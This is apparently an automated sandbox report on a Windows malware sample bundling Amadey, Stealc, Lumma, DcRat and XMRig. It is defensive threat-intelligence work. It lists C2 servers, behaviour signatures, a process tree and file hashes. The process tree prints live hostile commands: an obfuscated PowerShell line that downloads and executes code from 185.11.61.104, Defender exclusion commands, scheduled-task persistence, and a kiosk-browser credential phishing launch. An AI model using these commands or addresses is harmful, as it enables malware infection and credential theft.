Analysis

  • max time kernel
    141s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-12-2024 16:00

General

  • Target

    file.exe

  • Size

    2.9MB

  • MD5

    657b1d5bada53a94c7eb16a8f6780aef

  • SHA1

    3f913ed5ca66f8d29d2ea004792ba71fd3b157bc

  • SHA256

    091bc5705ea1f8127db8f1d53c883ba04b79afb04bece4f90c73d1311c546ade

  • SHA512

    7d3c5072fd4f5a3d542028798dddce15d0cf8c4a682c897d9075a8a825739842320bea82592ff9fbdc977519e5f933e8e78ac203b2c8d67ae5de62ae414cb4a9

  • SSDEEP

    49152:zG+JsK+1+7eu5B7x+DBPdkR/QkQJYVHgwLrNIX:zG+Jskeu5nknkNnRHNI

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.11.61.104/Z.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

cryptbot

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://sordid-snaked.cyou/api

https://awake-weaves.cyou/api

https://wrathful-jammy.cyou/api

https://debonairnukk.xyz/api

https://diffuculttan.xyz/api

https://effecterectz.xyz/api

https://deafeninggeh.biz/api

https://immureprech.biz/api

https://tacitglibbr.biz/api

https://shineugler.biz/api

Extracted

Family

lumma

C2

https://tacitglibbr.biz/api

https://shineugler.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Enumerates VirtualBox registry keys 2 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • XMRig Miner payload 13 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 44 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2452
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Users\Admin\AppData\Local\Temp\1016072001\muNJF0r.exe
        "C:\Users\Admin\AppData\Local\Temp\1016072001\muNJF0r.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1284
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Bridgecontainerserver\VBxKsR3W5qREBSxxvIt5VpzoFdFFANtbsRk6NDfKSHeOxN7UsJds5Ck.vbe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2472
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Bridgecontainerserver\SlMo.bat" "
            5⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1548
            • C:\Bridgecontainerserver\BrokerhostNet.exe
              "C:\Bridgecontainerserver/BrokerhostNet.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2092
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dwm.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2772
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Bridgecontainerserver\BrokerhostNet.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:1512
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pTOjMexGc2.bat"
                7⤵
                  PID:2848
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    8⤵
                      PID:2344
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      8⤵
                        PID:2284
                      • C:\Bridgecontainerserver\BrokerhostNet.exe
                        "C:\Bridgecontainerserver\BrokerhostNet.exe"
                        8⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:584
            • C:\Users\Admin\AppData\Local\Temp\1016171001\78aa44a208.exe
              "C:\Users\Admin\AppData\Local\Temp\1016171001\78aa44a208.exe"
              3⤵
              • Enumerates VirtualBox registry keys
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1796
            • C:\Users\Admin\AppData\Local\Temp\1016172001\f34f54a4d7.exe
              "C:\Users\Admin\AppData\Local\Temp\1016172001\f34f54a4d7.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2796
              • C:\Windows\system32\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                4⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:996
                • C:\Windows\system32\mode.com
                  mode 65,10
                  5⤵
                    PID:1636
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1028
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_7.zip -oextracted
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:916
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_6.zip -oextracted
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1544
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_5.zip -oextracted
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1536
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_4.zip -oextracted
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2232
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_3.zip -oextracted
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2296
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_2.zip -oextracted
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2372
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_1.zip -oextracted
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1592
                  • C:\Windows\system32\attrib.exe
                    attrib +H "in.exe"
                    5⤵
                    • Views/modifies file attributes
                    PID:2340
                  • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                    "in.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:2108
                    • C:\Windows\system32\attrib.exe
                      attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      6⤵
                      • Views/modifies file attributes
                      PID:1692
                    • C:\Windows\system32\attrib.exe
                      attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      6⤵
                      • Views/modifies file attributes
                      PID:1584
                    • C:\Windows\system32\schtasks.exe
                      schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                      6⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:2844
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell ping 127.0.0.1; del in.exe
                      6⤵
                      • System Network Configuration Discovery: Internet Connection Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3048
                      • C:\Windows\system32\PING.EXE
                        "C:\Windows\system32\PING.EXE" 127.0.0.1
                        7⤵
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:2416
              • C:\Users\Admin\AppData\Local\Temp\1016173001\5d2419133e.exe
                "C:\Users\Admin\AppData\Local\Temp\1016173001\5d2419133e.exe"
                3⤵
                • Executes dropped EXE
                PID:2780
              • C:\Users\Admin\AppData\Local\Temp\1016174001\df5b2b96d3.exe
                "C:\Users\Admin\AppData\Local\Temp\1016174001\df5b2b96d3.exe"
                3⤵
                • Executes dropped EXE
                PID:1808
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell.exe" -Command " $L='(New-Object Net.We'; $Y='bClient).Downlo'; $V='adString(''http://185.11.61.104/Z.png'')'; $F=I`E`X ($L,$Y,$V -Join '')|I`E`X"
                  4⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2348
                  • C:\Windows\system32\ipconfig.exe
                    "C:\Windows\system32\ipconfig.exe" /flushdns
                    5⤵
                    • Gathers network information
                    PID:1632
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 1808 -s 588
                  4⤵
                    PID:2360
                • C:\Users\Admin\AppData\Local\Temp\1016175001\136cc18cbe.exe
                  "C:\Users\Admin\AppData\Local\Temp\1016175001\136cc18cbe.exe"
                  3⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Loads dropped DLL
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:892
                  • C:\Users\Admin\AppData\Local\Temp\88R345LLKNBEFVF11ZCPCZ.exe
                    "C:\Users\Admin\AppData\Local\Temp\88R345LLKNBEFVF11ZCPCZ.exe"
                    4⤵
                    • Modifies Windows Defender Real-time Protection settings
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Windows security modification
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1096
                  • C:\Users\Admin\AppData\Local\Temp\0CW6NJBAOL3VRARWR7B.exe
                    "C:\Users\Admin\AppData\Local\Temp\0CW6NJBAOL3VRARWR7B.exe"
                    4⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    PID:680
                • C:\Users\Admin\AppData\Local\Temp\1016176001\1913e8dbc6.exe
                  "C:\Users\Admin\AppData\Local\Temp\1016176001\1913e8dbc6.exe"
                  3⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  PID:2104
                • C:\Users\Admin\AppData\Local\Temp\1016177001\467f3e217f.exe
                  "C:\Users\Admin\AppData\Local\Temp\1016177001\467f3e217f.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:2184
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM firefox.exe /T
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2264
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM chrome.exe /T
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2452
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM msedge.exe /T
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2648
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM opera.exe /T
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2536
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM brave.exe /T
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1688
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                    4⤵
                      PID:2956
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                        5⤵
                        • Checks processor information in registry
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:2588
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2588.0.526128369\63989493" -parentBuildID 20221007134813 -prefsHandle 1288 -prefMapHandle 1172 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {82c3938f-2a3f-4c9e-af7c-b426005e11da} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" 1392 105d9158 gpu
                          6⤵
                            PID:2968
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2588.1.1963971959\1154121665" -parentBuildID 20221007134813 -prefsHandle 1552 -prefMapHandle 1548 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f80e2dd-1c99-4a60-a608-867b7e7ca82f} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" 1564 e74e58 socket
                            6⤵
                              PID:1800
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2588.2.1634037101\135572100" -childID 1 -isForBrowser -prefsHandle 2064 -prefMapHandle 2060 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0536daf-5192-4714-83d3-04a2db1007e2} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" 2008 1ad99558 tab
                              6⤵
                                PID:868
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2588.3.1623136270\1561731870" -childID 2 -isForBrowser -prefsHandle 1724 -prefMapHandle 1720 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdb786b7-c56c-45b1-ae71-f189ab02f9d8} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" 2620 e63f58 tab
                                6⤵
                                  PID:1772
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2588.4.1545002868\35128630" -childID 3 -isForBrowser -prefsHandle 3784 -prefMapHandle 3792 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d2d5505-12ae-49a6-bec2-04c9b8c032d8} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" 3804 1ec04558 tab
                                  6⤵
                                    PID:2560
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2588.5.728863493\1943175433" -childID 4 -isForBrowser -prefsHandle 3912 -prefMapHandle 3916 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {191a911a-d56b-4087-943a-b088ff960461} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" 3900 1ec05158 tab
                                    6⤵
                                      PID:2040
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2588.6.1053203032\1810428753" -childID 5 -isForBrowser -prefsHandle 4076 -prefMapHandle 4080 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eafc43cd-e9ed-4043-9ec8-f622072cda77} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" 4064 1ec05a58 tab
                                      6⤵
                                        PID:1944
                                • C:\Users\Admin\AppData\Local\Temp\1016178001\221b949add.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1016178001\221b949add.exe"
                                  3⤵
                                  • Modifies Windows Defender Real-time Protection settings
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Windows security modification
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3408
                                • C:\Users\Admin\AppData\Local\Temp\1016179001\c1eff1f2b8.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1016179001\c1eff1f2b8.exe"
                                  3⤵
                                  • Enumerates VirtualBox registry keys
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:3968
                                • C:\Users\Admin\AppData\Local\Temp\1016180001\p9rUYZq.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1016180001\p9rUYZq.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:3336
                                • C:\Users\Admin\AppData\Local\Temp\1016181001\2116ee4a9d.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1016181001\2116ee4a9d.exe"
                                  3⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:3420
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Local\Temp\dwm.exe'" /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2276
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\dwm.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2312
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\AppData\Local\Temp\dwm.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:1744
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "BrokerhostNetB" /sc MINUTE /mo 14 /tr "'C:\Bridgecontainerserver\BrokerhostNet.exe'" /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:1616
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "BrokerhostNet" /sc ONLOGON /tr "'C:\Bridgecontainerserver\BrokerhostNet.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:2524
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /tn "BrokerhostNetB" /sc MINUTE /mo 6 /tr "'C:\Bridgecontainerserver\BrokerhostNet.exe'" /rl HIGHEST /f
                              1⤵
                              • Process spawned unexpected child process
                              • Scheduled Task/Job: Scheduled Task
                              PID:1584
                            • C:\Windows\system32\taskeng.exe
                              taskeng.exe {04527047-F981-4FC9-819A-CD0743F44F89} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
                              1⤵
                              • Loads dropped DLL
                              PID:3628
                              • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:3660
                                • C:\Windows\explorer.exe
                                  explorer.exe
                                  3⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3668
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                  3⤵
                                  • Drops file in System32 directory
                                  • System Network Configuration Discovery: Internet Connection Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3712
                                  • C:\Windows\system32\PING.EXE
                                    "C:\Windows\system32\PING.EXE" 127.1.10.1
                                    4⤵
                                    • System Network Configuration Discovery: Internet Connection Discovery
                                    • Runs ping.exe
                                    PID:3804
                              • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:3380
                                • C:\Windows\explorer.exe
                                  explorer.exe
                                  3⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3392
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                  3⤵
                                  • Drops file in System32 directory
                                  • System Network Configuration Discovery: Internet Connection Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3988
                                  • C:\Windows\system32\PING.EXE
                                    "C:\Windows\system32\PING.EXE" 127.1.10.1
                                    4⤵
                                    • System Network Configuration Discovery: Internet Connection Discovery
                                    • Runs ping.exe
                                    PID:3116

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Bridgecontainerserver\BrokerhostNet.exe

                              Filesize

                              1.9MB

                              MD5

                              0f91548ca49c64d6a8cd3846854f484c

                              SHA1

                              033c309b683020221ae189c4236a70c0d3ddd568

                              SHA256

                              a7883947a5f3c0d74f3eac6c2a6da45555298d769f5e3137e10a3ece14e83dfd

                              SHA512

                              e207b5545ceed034ec22f13e1a36f13656721b2c9cab97f6ec7ba8195f32ddc1673e1334902b2d4fc0ce393baf7f806bedf4a03a26a8ffe79ad17a87cf9a90a2

                            • C:\Bridgecontainerserver\SlMo.bat

                              Filesize

                              89B

                              MD5

                              20c75fef4553c17d36635750cfb57049

                              SHA1

                              8489a5998acaa63326bc1a665c38eb71c5d1f426

                              SHA256

                              0dcef4794868f563d515bbeee69e35dde750411ee9dcaafdef597806c89cabd0

                              SHA512

                              2819f6585bd3ee7e9f1703c259b97b21dbacde276186a489acfea0c36f377f751845b50ed00a70e029e95f588193cf69f77aeaf2785e67888378b9f2e95ee92a

                            • C:\Bridgecontainerserver\VBxKsR3W5qREBSxxvIt5VpzoFdFFANtbsRk6NDfKSHeOxN7UsJds5Ck.vbe

                              Filesize

                              204B

                              MD5

                              e52eec5fe59f0e73555c7d43c0035f62

                              SHA1

                              e6fcc87b7d260c2fcfff89e28e7d45357357520e

                              SHA256

                              b5712ce1aa870e16ed1464f1ecd627aed7020bb48c61252471cf9ec0b2d38d7f

                              SHA512

                              325c467e6519fb72238c62abbb7b89d32016a71416d41f148a38e41853928fc9cc84ed6b096784af9b1ad23c3363316d6b4f3464959127dfee1794cc926d40a7

                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\activity-stream.discovery_stream.json.tmp

                              Filesize

                              23KB

                              MD5

                              93d69f1aa22d772b4ecec51473d96d65

                              SHA1

                              099f00c6990d986f6f47eeaad2d0bbfab6c11026

                              SHA256

